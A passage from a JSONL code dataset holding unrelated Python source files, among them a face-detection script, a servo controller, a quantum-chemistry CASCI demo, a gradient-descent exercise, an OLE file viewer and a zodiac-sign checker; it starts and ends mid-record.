np.log10(bc_max_hv - np.asarray(hvs))\n\nimport matplotlib.pyplot as plt\nplt.plot(log_hv_diff)\n# plt.savefig('plt.pdf')\nplt.show()\n","sub_path":"test/optimizer/test_smbo_mcparego.py","file_name":"test_smbo_mcparego.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"413586674","text":"from pysvg.builders import Svg, ShapeBuilder, StyleBuilder\nfrom pysvg.text import *\n\ndef createblock(number):\n colors = {}\n colors[2]=('#eee4da','#776e65')\n colors[4]=('#ede0c8','#776e65')\n colors[8]=('#f2b179','#f9f6f2')\n colors[16]=('#f59563','#f9f6f2')\n colors[32]=('#f67c5f','#f9f6f2')\n colors[64]=('#f65e3b','#f9f6f2')\n colors[128]=('#edcf72','#f9f6f2')\n colors[256]=('#edcc61','#f9f6f2')\n colors[512]=('#eee4da','#776e65')\n colors[1024]=('#edc53f','#f9f6f2')\n colors[2048]=('#edc22e','#f9f6f2')\n \n canvas = Svg(0,0,100,100)\n sb = ShapeBuilder()\n canvas.addElement( sb.createRect(5,5,90,90,fill=colors[number][0]) )\n \n t = Text(number,50,60)\n t.set_style(\"font-family:FreeSans;font-weight:bold;font-size:36px;text-anchor:middle\")\n t.set_fill(colors[number][1])\n canvas.addElement(t)\n canvas.save('/tmp/try7.svg')\n\n\ncreateblock(128)\n","sub_path":"2048/ui/mainui_2.py","file_name":"mainui_2.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268214416","text":"import unittest\n\nfrom pykev.lib.leet_code.complex_multiple__537 import multiply_complex\n\nclass TestComplexNumberMultiplication(unittest.TestCase):\n def test_multiply_complex(self):\n TEST_CASES = [\n ((\"1+1i\", \"1+1i\"), \"0+2i\"),\n ((\"1+-1i\", \"1+-1i\"), \"0+-2i\"),\n ]\n\n for args, expected in TEST_CASES:\n output = multiply_complex(*args)\n\n assert output == expected, '{a}: {o} != {e}'.format(\n a=args,\n o=output,\n e=expected,\n )\n\n return\n","sub_path":"test/test_leet_code/test_537.py","file_name":"test_537.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25343914","text":"import cv2\n\n\n# Loading the cascades. xml files\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\nsmile_cascade = cv2.CascadeClassifier('haarcascade_smile.xml')\n\n# Define functions that will do the detections.\n\n# will take input of images coming from the webcam.\n# NOTE: Cascades work o black and white image.\n# So accepting the image here in black and white (gray)\n# and also the original image\ndef detect(gray, frame):\n\t# Get the coordinates of the rectangle which detect the face.\n\n\t# x, y are the coordiantes on the upper left corner.\n\t# w and h are the width and height respectively.\n\t# x, y, w, h = \n\n\t# detectMultiScale method takes the gray image.and \n\t# other arguments include the factor by which image size is going to be reduced.\n\t# min. no. neighbours.\n\n\tfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\t# print (faces) # tuples (x,y,w,h)\n\n\tfor (x,y,w,h) in faces:\n\t\t# Draw the rectangle for the faces.\n\t\tcv2.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)\n\n\t\t# Eyes will be detected where we have found our face.\n\t\t# So we will perform our tests on the face's referential frame in order to save the computational time.\n\n\t\t# We will be taking to region of interest. The gray scale image and the colored image.\n\n\t\troi_gray = gray[y:y+h, x:x+w]\n\t\troi_color = frame[y:y+h, x:x+w]\n\n\t\t# Detecting the eyes.\n\t\teyes = eye_cascade.detectMultiScale(roi_gray, 1.1, 22)\n\n\t\tfor (ex, ey, ew, eh) in eyes:\n\t\t\tcv2.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0,255,0), 2)\n\n\t\t# Smile detector.\n\t\tsmile = smile_cascade.detectMultiScale(roi_gray, 1.7, 22)\n\n\t\tfor (sx, sy, sw, sh) in smile:\n\t\t\tcv2.rectangle(roi_color, (sx, sy), (sx+sw, sy+sh), (0,0,255), 2)\n\n\treturn frame\n\n# DO face recognition using webcam.\n# We will apply this function to the last frame coming on the webcam.\n\nvideo_capture = cv2.VideoCapture(0) # 0 for computer webcam.\n\nwhile True:\n\t_, last_frame = video_capture.read()\n\t# convert to gray scale\n\tgray = cv2.cvtColor(last_frame, cv2.COLOR_BGR2GRAY)\n\n\tcanvas = detect(gray, last_frame)\n\n\tcv2.imshow('Video', canvas)\n\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n","sub_path":"open_files/smile_detection.py","file_name":"smile_detection.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"71679579","text":"import math\nfrom itertools import izip, chain\nfrom copy import copy\n\n\ndef sigmoid(x, bias, gain):\n x = max(-60.0, min(60.0, x))\n return 1. / ( 1. + math.exp( -gain * (x - bias) ) )\n\n\nclass Node(object):\n def __init__(self):\n self.value = 0\n self._new_value = 0\n self.inputs = []\n\n def reset(self, value):\n self.value = value\n self._new_value = value\n\n def flip(self):\n self.value = self._new_value\n\n def add_input(self, input_node, weight):\n self.inputs.append((input_node, weight))\n\n\nclass InputNode(Node): pass\n\n\nclass ComputeNode(Node):\n def __init__(self, act_func):\n super(ComputeNode, self).__init__()\n self.act_func = act_func\n\n def compute(self):\n in_value = 0\n for inp, weight in self.inputs:\n in_value += inp.value * weight\n\n self._new_value = self.act_func(in_value)\n\n\nclass NN:\n\n\n def __init__(self):\n self.in_nodes = []\n self.comp_nodes = []\n self.out_nodes = []\n\n\n def from_genome(self, genome):\n\n nodes = {}\n\n for ng in genome.neuron_genes:\n if ng.gene_type == 'sigmoid':\n\n node = ComputeNode(\n act_func = lambda x, bias=ng.bias, gain=ng.gain: sigmoid(x, bias, gain)\n )\n\n # output nodes go in both compute list and output list\n # hidden nodes only go in compute list\n if ng.layer in ['hidden', 'output']:\n self.comp_nodes.append(node)\n if ng.layer == 'output':\n self.out_nodes.append(node)\n\n elif ng.gene_type == 'input':\n node = InputNode()\n self.in_nodes.append(node)\n\n nodes[ng.historical_mark] = node\n\n for cg in genome.connection_genes:\n nodes[cg.mark_to].add_input(nodes[cg.mark_from], cg.weight)\n\n return self\n\n\n def reset(self):\n # reset node values\n for node in chain(self.in_nodes, self.comp_nodes, self.out_nodes):\n node.reset(0)\n\n\n def compute(self, inputs):\n # set inputs\n for in_node, in_value in izip(self.in_nodes, inputs):\n in_node.reset(in_value)\n\n # compute\n for _ in range(2):\n for node in self.comp_nodes: node.compute()\n for node in self.comp_nodes: node.flip()\n\n # get outputs\n return list(out_node.value for out_node in self.out_nodes)","sub_path":"examples/nn_impl.py","file_name":"nn_impl.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"184902348","text":"# ===============================================================================\n# Copyright 2014 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ===============================================================================\n\n# ============= enthought library imports =======================\nfrom traits.api import Instance, Enum, Any, List\n\n# ============= standard library imports ========================\n# ============= local library imports ==========================\nfrom pychron.loggable import Loggable\nfrom pychron.processing.export.exporter import Exporter\nfrom pychron.processing.export.massspec_analysis_exporter import MassSpecAnalysisExporter\nfrom pychron.processing.export.sqlite_analysis_exporter import SQLiteAnalysisExporter\nfrom pychron.processing.export.xml_analysis_exporter import XMLAnalysisExporter\nfrom pychron.processing.export.yaml_analysis_exporter import YAMLAnalysisExporter\n\nEX_KLASS_DICT = {'MassSpec': MassSpecAnalysisExporter,\n 'XML': XMLAnalysisExporter,\n 'YAML': YAMLAnalysisExporter,\n 'SQLite': SQLiteAnalysisExporter}\n\n\nclass ExportManager(Loggable):\n kind = Enum('SQLite', 'XML', 'MassSpec', 'YAML')\n exporter = Instance(Exporter)\n manager = Any\n\n exported_analyses = List\n\n def export(self, ans):\n if self.exporter.start_export():\n n = len(ans)\n prog = self.manager.open_progress(n)\n for ei in ans:\n self._export_analysis(ei, prog)\n self.exported_analyses.append(ei)\n self.exporter.export()\n prog.close()\n else:\n self.warning('Export failed to start')\n\n # def _make_export_spec(self, ai):\n # ai = self.manager.make_analysis(ai, calculate_age=True,\n # unpack=True,\n # use_cache=False)\n\n # return self.exporter.make_spec(ai)\n\n # rs_name, rs_text=assemble_script_blob()\n # rs_name, rs_text = '', ''\n # rid = ai.record_id\n # exp = MassSpecExportSpec(runid=rid,\n # runscript_name=rs_name,\n # runscript_text=rs_text,\n # mass_spectrometer=ai.mass_spectrometer.capitalize(),\n # isotopes=ai.isotopes)\n #\n # exp.load_record(ai)\n # return exp\n\n def _exporter_default(self):\n return SQLiteAnalysisExporter(iso_manager=self.manager)\n\n def _kind_changed(self):\n\n try:\n klass = EX_KLASS_DICT[self.kind]\n self.exporter = klass()\n if self.kind == 'SQLite':\n self.exporter.iso_manager = self.manager\n\n except KeyError:\n self.warning_dialog('invalid kind {}. available={}'.format(self.kind,\n ','.join(EX_KLASS_DICT.keys())))\n # if self.kind == 'MassSpec':\n # self.exporter = MassSpecExporter()\n # elif\n # else:\n # self.exporter = XMLAnalysisExporter()\n\n def _export_analysis(self, ai, prog):\n # db=self.manager.db\n # with db.session_ctx():\n # dest=self.destination\n # espec = self._make_export_spec(ai)\n self.exporter.add(ai)\n prog.change_message('Export analysis {}'.format(ai.record_id))\n\n# ============= EOF =============================================\n\n","sub_path":"pychron/processing/export/export_manager.py","file_name":"export_manager.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"379190837","text":"# This gives us control of the Raspberry Pi's pins.\n# This is only used for time delays... standard Python stuff.\n\nimport RPi.GPIO as GPIO\n\npin_number = 35\nfrequency_hertz = 50\nleft_position = 0.40\nright_position = 2.5\nms_per_cycle = 1000 / frequency_hertz\n\n\nclass ServoControl:\n wasSet = False\n pwm = None\n\n def initGpio(self):\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(pin_number, GPIO.OUT)\n self.pwm = GPIO.PWM(pin_number, frequency_hertz)\n self.pwm.start(0)\n\n def set(self, value):\n if not self.wasSet:\n print('init gpio')\n self.initGpio()\n self.wasSet = True\n print('setting to {}'.format(value))\n position = left_position + (right_position - left_position) * (value + 100) / 200\n self.pwm.start(position * 100 / ms_per_cycle)\n\n def shutdown(self):\n self.pwm.stop()\n GPIO.cleanup()\n\n\nSERVO_CONTROL = ServoControl()\n","sub_path":"mzdriver/servo_control.py","file_name":"servo_control.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"83821136","text":"# ==========================================================================================\n# ==========================================================================================\n# \n# A code to demonstrate how to implement a CASCI method with \n# the QuantNBody package on the LiH molecule.\n# The results are compared to the FCI method already implemented in the\n# Psi4 quantum chemistry package.\n#\n# Author : Saad Yalouz\n# ==========================================================================================\n# ==========================================================================================\n\nimport numpy as np \nimport psi4 \nimport math\nimport scipy \nimport matplotlib.pyplot as plt\nimport sys \nsys.path.append('../')\n\nimport quantnbody as qnb\n\ndef RUN_CASCI_PSI4( string_geo,\n basisset, \n active_indices,\n frozen_indices,\n virtual_indices ):\n '''\n A function to run a CASCI method with the Psi4 package\n ''' \n \n psi4.geometry( string_geo )\n psi4.set_options({ 'basis': basisset, \n 'reference': 'RHF',\n 'scf_type': 'DIRECT', # set e_convergence and d_convergence to 1e-8 instead of 1e-6\n 'num_roots': 2, \n 'frozen_docc' : [ len(frozen_indices) ],\n 'active' : [ len(active_indices) ], \n 'frozen_uocc' : [ len(virtual_indices) ], \n 'S' : 0 })\n \n Escf, wfnSCF = psi4.energy('scf', return_wfn=True)\n casci, casci_wfn = psi4.energy('fci',return_wfn=True)\n\n E0_casci = psi4.variable('CI ROOT 0 TOTAL ENERGY')\n E1_casci = psi4.variable('CI ROOT 1 TOTAL ENERGY')\n \n return E0_casci, E1_casci \n\n#%%\n\npsi4.core.set_output_file(\"output_Psi4.txt\", False)\n\n#========================================================|\n# Parameters for the simulation\n# General Quantum chemistry parameters =======\nbasisset = 'sto-3g'\nnelec_active = 2 # Number of active electrons in the Active-Space \nfrozen_indices = [ i for i in range(1) ]\nactive_indices = [ i for i in range(1,3) ]\nvirtual_indices = [ i for i in range(3,6) ] \n\n# Dimension of the many-body space \ndim_H = math.comb( 2*len(active_indices) , nelec_active ) \n\n# Building the Many-body basis \nnbody_basis = qnb.fermionic.tools.build_nbody_basis( len(active_indices) , nelec_active )\n\n# Building the matrix representation of the adagger_a operator in the many-body basis \na_dagger_a = qnb.fermionic.tools.build_operator_a_dagger_a( nbody_basis )\n\n# Building the matrix representation of several interesting spin operators in the many-body basis \nS_2, S_p, S_Z = qnb.fermionic.tools.build_s2_sz_splus_operator( a_dagger_a )\n\n#%%\n \nlist_r = np.linspace(0.25, 2.2, 10) \n\nE_0_qnb = []\nE_1_qnb = []\n\nfor r in ( list_r ): \n \n #========================================================|\n # Molecular geometry / Quantum chemistry calculations \n # Li-H geometry \n string_geo = \"\"\"Li 0 0 0\n H 0 0 {}\n symmetry c1 \"\"\".format( r )\n \n molecule = psi4.geometry(string_geo) \n psi4.set_options({'basis' : basisset,\n 'reference' : 'rhf',\n 'SCF_TYPE' : 'DIRECT' })\n \n scf_e, scf_wfn = psi4.energy( 'HF', molecule=molecule, return_wfn=True, verbose=0 )\n E_rep_nuc = molecule.nuclear_repulsion_energy()\n C_RHF = np.asarray(scf_wfn.Ca()).copy() # MO coeff matrix from the initial RHF calculation\n mints = psi4.core.MintsHelper(scf_wfn.basisset()) # Get AOs integrals using MintsHelper\n Num_AO = np.shape(np.asarray(mints.ao_kinetic()))[0] \n\n #%%\n # Construction of the first reference Hamiltonian / MO integrals\n C_ref = C_RHF # Initial MO coeff matrix \n \n # Storing the 1/2-electron integrals in the original AO basis\n h_AO = np.asarray(mints.ao_kinetic()) + np.asarray(mints.ao_potential()) \n g_AO = np.asarray(mints.ao_eri()).reshape(( Num_AO, Num_AO, Num_AO, Num_AO )) \n \n h_MO, g_MO = qnb.fermionic.tools.transform_1_2_body_tensors_in_new_basis( h_AO, g_AO, C_ref )\n \n E_core, h_, g_ = qnb.fermionic.tools.qc_get_active_space_integrals(h_MO,\n g_MO,\n frozen_indices = frozen_indices,\n active_indices = active_indices)\n #%%\n # Building the matrix representation of the Hamiltonian operators \n H = qnb.fermionic.tools.build_hamiltonian_quantum_chemistry(h_,\n g_,\n nbody_basis,\n a_dagger_a,\n S_2=S_2,\n S_2_target=0,\n penalty=100)\n \n eig_en, eig_vec = scipy.linalg.eigh( H.A )\n E_0_qnb += [ eig_en[0] + E_core + E_rep_nuc ]\n E_1_qnb += [ eig_en[1] + E_core + E_rep_nuc ]\n \n# =======================================================|\n# SIMILAR CALCULATION WITH THE PSI4 package =============|\n#========================================================|\nE_0_psi4 = [ ]\nE_1_psi4 = [ ]\nfor r in ( list_r ): \n \n #========================================================|\n # Molecular geometry / Quantum chemistry calculations\n # Clean all previous options for psi4\n \n string_geo = \"\"\"Li 0 0 0\n H 0 0 {}\n symmetry c1 \"\"\".format( r )\n \n E0_casci, E1_casci = RUN_CASCI_PSI4( string_geo,\n basisset, \n active_indices,\n frozen_indices,\n virtual_indices )\n\n E_0_psi4 += [ E0_casci ]\n E_1_psi4 += [ E1_casci ]\n\n#%%\n \nplt.rc('font', family='Helvetica')\nplt.rc('mathtext', fontset='stix')\nplt.rc('xtick', labelsize='xx-large')\nplt.rc('ytick', labelsize='xx-large')\nplt.rc('lines', linewidth='2')\n\nfig, (ax1) = plt.subplots(nrows=1, ncols=1, figsize=(8, 6)) \nax1.plot( list_r, E_0_psi4, color='red', label='$E_0^{psi4}$')\nax1.plot( list_r, E_1_psi4, color='red', label='$E_1^{psi4}$')\nax1.plot( list_r, E_0_qnb, color='blue', ls=':', marker='o', label='$E_0^{qnb}$')\nax1.plot( list_r, E_1_qnb, color='blue', ls=':', marker='o', label='$E_1^{qnb}$')\nax1.set_xlabel('Intertatomic distance $r_{Li-H}$ ($\\AA$) ', size=22)\nax1.set_ylabel('Energy (Ha)', size=22)\nax1.set_ylim(-8,-5)\nax1.legend(fontsize='x-large')\nax1.grid()\nplt.show()\n","sub_path":"Tutorials/Examples_chemistry/Demo_CASCI_LiH.py","file_name":"Demo_CASCI_LiH.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"336024004","text":"import re\n\nclass RejestracjaKart():\n def __init__(self):\n self._Idkarty = ''\n\n\n def sprawdzCzyWBazie(self, _Idkarty):\n res = 'Nie'\n try:\n with open('Karty.csv', encoding='utf-8', mode='r') as file_obj:\n for line in file_obj:\n if line.replace('\\n', '') == _Idkarty:\n res = 'Tak'\n break\n file_obj.close()\n return res\n except FileNotFoundError:\n res = 'Blad'\n return res\n\n\n def dodajDoBazy(self, _Idkarty):\n flag = self.sprawdzCzyWBazie(_Idkarty)\n if flag == 'Nie':\n if len(_Idkarty) == 6:\n if re.match(r'KN[0-9]{4}', _Idkarty):\n\n with open('Karty.csv', encoding='utf-8', mode='a') as file_obj:\n file_obj.write('\\n'+_Idkarty)\n file_obj.close()\n return self.poinformujOWyniku(1)\n else:\n return self.poinformujOWyniku(2)\n else:\n return self.poinformujOWyniku(2)\n elif flag == 'Tak':\n return self.poinformujOWyniku(3)\n else:\n return self.poinformujOWyniku(4)\n\n\n def poinformujOWyniku(self, czyPozytywny):\n if czyPozytywny == 1:\n return 'Dodano nową kartę.'\n elif czyPozytywny == 2:\n return 'Karta o niepoprawnym formacie.'\n elif czyPozytywny == 3:\n return 'Karta istnieje już w bazie.'\n elif czyPozytywny == 4:\n return 'Brak połączenia z bazą kart.'\n else:\n return 'Nieznany błąd.'\n\n","sub_path":"RejestracjaKart.py","file_name":"RejestracjaKart.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"487522927","text":"import numpy as np\r\nimport math\r\nimport random\r\nfrom astropy.table import Table, Column\r\n\r\nA = [[1, 2, 3],\r\n [2, 3, 4],\r\n [4, 5, 6],\r\n [1, 1, 1]]\r\n\r\nAT = np.transpose(A)\r\n\r\nb = [1, 1, 1, 1]\r\n\r\n# These store the values of x and number of iterations over each trial (for the table)\r\nxList = list()\r\ncountList = list()\r\n\r\n# Generates a starting x vector with random numbers normally distributed around the origin\r\ndef generateRandomX():\r\n x = list()\r\n for i in range (3):\r\n x.append(random.normalvariate(0, 2))\r\n return x\r\n\r\ndef gradientDescent (stepSize, tolerance):\r\n x = generateRandomX()\r\n \r\n count = 0\r\n while (1):\r\n change = np.matmul(AT, np.matmul(A, x)) - np.matmul(AT, b)\r\n if math.isinf(np.linalg.norm(change, 2)):\r\n x = \"Could Not Converge (step size too large)\"\r\n break\r\n if np.linalg.norm(change, 2) <= tolerance:\r\n break\r\n\r\n x = np.subtract(x, stepSize * change)\r\n count += 1\r\n \r\n xList.append(str(x))\r\n countList.append(str(count))\r\n\r\n\r\ngradientDescent(0.01, 0.01)\r\ngradientDescent(0.05, 0.01)\r\ngradientDescent(0.1, 0.01)\r\ngradientDescent(0.15, 0.01)\r\ngradientDescent(0.2, 0.01)\r\ngradientDescent(0.25, 0.01)\r\ngradientDescent(0.5, 0.01)\r\n\r\n\r\n\r\nt = Table()\r\nt['Values of x'] = xList\r\nt['Number of Iterations'] = countList\r\nprint(t)\r\n","sub_path":"a1/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"312704151","text":"# -*- coding: utf-8 -*-\n\n\nfrom PySide2.QtWidgets import (\n QMainWindow,\n QMdiArea,\n QTabBar,\n QFileDialog,\n QMessageBox,\n QApplication,\n QVBoxLayout,\n QWidget)\nfrom PySide2.QtGui import (\n QKeySequence,\n QIcon)\nfrom PySide2.QtCore import (\n QSize)\n\nfrom .oleview import OleView\nfrom .oledocument import OleDocument\nfrom .stylehelper import dpiScaled\nfrom .oleevents import SelectionChangedEvent\nfrom .aboutdialog import AboutDialog\n\n\nclass OleWindow(QMainWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setWindowTitle(self.tr(\"OLE Editor\"))\n self.resize(dpiScaled(QSize(880, 510)))\n\n self._mdiArea = QMdiArea(self)\n self._tabBar = QTabBar(self)\n self._tabBar.setExpanding(False)\n self._tabBar.setTabsClosable(True)\n\n centralWidget = QWidget(self)\n vbox = QVBoxLayout(centralWidget)\n vbox.setMargin(0)\n vbox.addWidget(self._tabBar)\n vbox.addWidget(self._mdiArea)\n\n self.setCentralWidget(centralWidget)\n\n self._initMenu()\n\n self._mdiArea.subWindowActivated.connect(\n self._onSubWindowActivated)\n\n self._tabBar.currentChanged.connect(\n self._onCurrentTabChanged)\n self._tabBar.tabCloseRequested.connect(\n self._onTabCloseRequested)\n\n def _initMenu(self):\n fileMenu = self.menuBar().addMenu(self.tr(\"&File\"))\n ac = fileMenu.addAction(self.tr(\"&Open\"),\n self.onFileMenuOpen,\n QKeySequence(\"Ctrl+O\"))\n ac.setIcon(QIcon.fromTheme(\"document-open\"))\n fileMenu.addSeparator()\n ac = fileMenu.addAction(self.tr(\"&Quit\"),\n self.onFileMenuQuit,\n QKeySequence(\"Ctrl+Q\"))\n ac.setIcon(QIcon.fromTheme(\"application-exit\"))\n\n editMenu = self.menuBar().addMenu(self.tr(\"&Edit\"))\n ac = editMenu.addAction(self.tr(\"&Copy\"),\n self.onEditMenuCopy,\n QKeySequence(\"Ctrl+C\"))\n ac.setIcon(QIcon.fromTheme(\"edit-copy\"))\n self._acCopy = ac\n self._acCopy.setEnabled(False)\n\n helpMenu = self.menuBar().addMenu(self.tr(\"&Help\"))\n ac = helpMenu.addAction(self.tr(\"&About\"),\n self.onHelpMenuAbout)\n ac.setIcon(QIcon.fromTheme(\"help-about\"))\n helpMenu.addAction(self.tr(\"About &Qt\"),\n QApplication.aboutQt)\n\n def onFileMenuOpen(self):\n files, _ = QFileDialog.getOpenFileNames(\n self,\n self.tr(\"Open OLE Files\"),\n filter=self.tr(\"All Files\") + \" (*.*)\")\n for file in files:\n self.openFile(file)\n\n def onFileMenuQuit(self):\n self.close()\n\n def onEditMenuCopy(self):\n curSubWnd = self._mdiArea.activeSubWindow()\n curSubWnd.widget().editor.copy()\n\n def onHelpMenuAbout(self):\n aboutDialog = AboutDialog(self)\n aboutDialog.exec()\n\n def _onSubWindowActivated(self, subWin):\n enabled = subWin.widget().editor.hasSelection() if subWin else False\n self._acCopy.setEnabled(enabled)\n\n if not subWin:\n return\n index = self._mdiArea.subWindowList().index(subWin)\n if self._tabBar.currentIndex() != index:\n self._tabBar.setCurrentIndex(index)\n\n def _onCurrentTabChanged(self, index):\n if index < 0:\n return\n\n subWindows = self._mdiArea.subWindowList()\n if index >= len(subWindows):\n return\n\n self._mdiArea.setActiveSubWindow(subWindows[index])\n\n def _onTabCloseRequested(self, index):\n subWindows = self._mdiArea.subWindowList()\n subWindows[index].close()\n self._tabBar.removeTab(index)\n\n def openFile(self, filePath):\n subWin = self.getSubWinByFilePath(filePath)\n if subWin:\n self._mdiArea.setActiveSubWindow(subWin)\n return\n\n if not OleDocument.isOleFile(filePath):\n QMessageBox.critical(self,\n self.windowTitle(),\n self.tr(\"'{}' is not an OLE2 structed storage file!\").format(filePath))\n return\n\n doc = OleDocument()\n if not doc.open(filePath):\n QMessageBox.critical(self,\n self.windowTitle(),\n self.tr(\"Failed to open file: '{}'!\").format(filePath))\n return\n\n view = OleView(doc, self)\n subWin = self._mdiArea.addSubWindow(view)\n self._tabBar.addTab(subWin.windowIcon(), self.tabTitleFor(subWin))\n subWin.showMaximized()\n\n def getSubWinByFilePath(self, filePath):\n subWindows = self._mdiArea.subWindowList()\n for sw in subWindows:\n if sw.widget().getFilePath() == filePath:\n return sw\n\n return None\n\n def event(self, event):\n if event.type() == SelectionChangedEvent.Type:\n curSubWnd = self._mdiArea.activeSubWindow()\n if curSubWnd and curSubWnd.widget() == event.view:\n self._acCopy.setEnabled(event.view.editor.hasSelection())\n return True\n\n return super().event(event)\n\n def tabTitleFor(self, subWindow):\n return subWindow.windowTitle()\n","sub_path":"oleeditor/olewindow.py","file_name":"olewindow.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"613335501","text":"\"\"\"\nInitiallize input names (See pattern below):\n\n>>> initials('code wars')\n'C.Wars'\n>>> initials('Barack Hussain obama')\n'B.H.Obama'\n\n\"\"\"\n\ndef initials(name):\n\n\tname_list = name.split(\" \")\n\tinitials_str = \"\"\n\n\tfor i in range(len(name_list)-1):\n\t\tinitials_str = initials_str + name_list[i][0].upper() + \".\"\n\n\treturn initials_str + name_list[-1].title()\n\n\nif __name__ == \"__main__\":\n\timport doctest\n\tdoctest.testmod()","sub_path":"cw/cw_7_cWarsInitials.py","file_name":"cw_7_cWarsInitials.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163803329","text":"import io\nimport signal\nimport sys\nimport tkinter as tk\nimport pokebase as pb\n\n# Go to root of PyNTRReader\nsys.path.append('../')\n\nfrom ntrreader import G6Reader\nfrom PIL import Image, ImageTk\nfrom structure import PK6\nfrom ip import IP_ADDR\n\nclass Application(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.pack()\n self.create_widgets()\n self.last_info = \"\"\n signal.signal(signal.SIGINT, self.signal_handler)\n\n def create_widgets(self):\n self.master.title(\"Transporter Reader\")\n self.type_var = tk.IntVar()\n self.connect_button = tk.Button(self, text=\"Connect\", fg=\"green\", command=self.connect)\n self.connect_button.grid(column=0,row=1)\n self.current_info_display = tk.Text(self,height=5)\n self.current_info_display.grid(column=2, row=2, rowspan=3)\n self.image_display = tk.Label(self)\n self.image_display.grid(column=0, row=2, columnspan=2, rowspan=3)\n self.quit = tk.Button(self, text=\"Disconnect\", fg=\"red\", command=self.disconnect)\n self.quit.grid(column=1,row=1)\n\n def connect(self):\n print(\"Connecting to: \", IP_ADDR)\n self.G6Reader = G6Reader(IP_ADDR)\n self.update()\n\n def disconnect(self):\n print(\"Disconnecting\")\n self.after_cancel(self.after_token)\n self.G6Reader.close(False)\n self.G6Reader = None\n \n def signal_handler(self, signal, frame):\n self.disconnect()\n sys.exit(0)\n \n def update(self):\n read_func = self.G6Reader.readTransporter\n\n try:\n pk6 = PK6(read_func())\n error = False\n except Exception as e:\n print(e)\n error = True\n while error:\n try:\n pk6 = PK6(read_func())\n error = False\n except:\n error = True\n \n if not pk6.isValid:\n print(\"Invalid or Not Present\")\n self.last_info = \"\"\n self.image_display.config(image='')\n self.current_info_display.delete(1.0, tk.END)\n elif str(pk6) != self.last_info:\n info = str(pk6)\n s1 = pb.SpriteResource('pokemon', pk6.species, shiny=pk6.shinyType).img_data\n im = Image.open(io.BytesIO(s1)).convert('RGBA')\n image = ImageTk.PhotoImage(im)\n self.image = image\n self.image_display.config(image=image)\n self.last_info = info\n self.current_info_display.delete(1.0, tk.END)\n self.current_info_display.insert(1.0, info)\n self.after_token = self.after(1000, self.update)\n\nroot = tk.Tk()\napp = Application(master=root)\napp.mainloop()","sub_path":"scripts/GUITransporter.py","file_name":"GUITransporter.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"81381882","text":"class DayError(Exception):\r\n pass\r\nclass MonthError(Exception):\r\n pass\r\n\r\nwhile True:\r\n try:\r\n date = input(\"Введите дату в формате дд.мм.гггг: \")\r\n day, month, year = int(date[:2]), int(date[3:5]), int(date[6:])\r\n # print(day, month, year)\r\n if month in [1, 3, 5, 7, 8, 10, 12]:\r\n if day < 1 or day > 31:\r\n raise DayError\r\n elif month in [4, 6, 9, 11]:\r\n if day < 1 or day > 30:\r\n raise DayError\r\n elif month == 2:\r\n if (year % 4 == 0 and year % 100 != 0) or (year % 400 == 0):\r\n if day < 1 or day > 29:\r\n raise DayError\r\n else:\r\n if day < 1 or day > 28:\r\n raise DayError\r\n else:\r\n raise MonthError\r\n\r\n if (day >= 21 and month == 3) or (day <= 19 and month == 4):\r\n print(\"Ты - овен!\")\r\n elif (day >= 20 and month == 4) or (day <= 20 and month == 5):\r\n print(\"Ты - телец!\")\r\n elif (day >= 21 and month == 5) or (day <= 20 and month == 6):\r\n print(\"Ты - близнец!\")\r\n elif (day >= 21 and month == 6) or (day <= 22 and month == 7):\r\n print(\"Ты - рак!\")\r\n elif (day >= 23 and month == 7) or (day <= 22 and month == 8):\r\n print(\"Ты - лев!\")\r\n elif (day >= 23 and month == 8) or (day <= 22 and month == 9):\r\n print(\"Ты - дева!\")\r\n elif (day >= 23 and month == 9) or (day <= 22 and month == 10):\r\n print(\"Ты - весы!\")\r\n elif (day >= 23 and month == 10) or (day <= 21 and month == 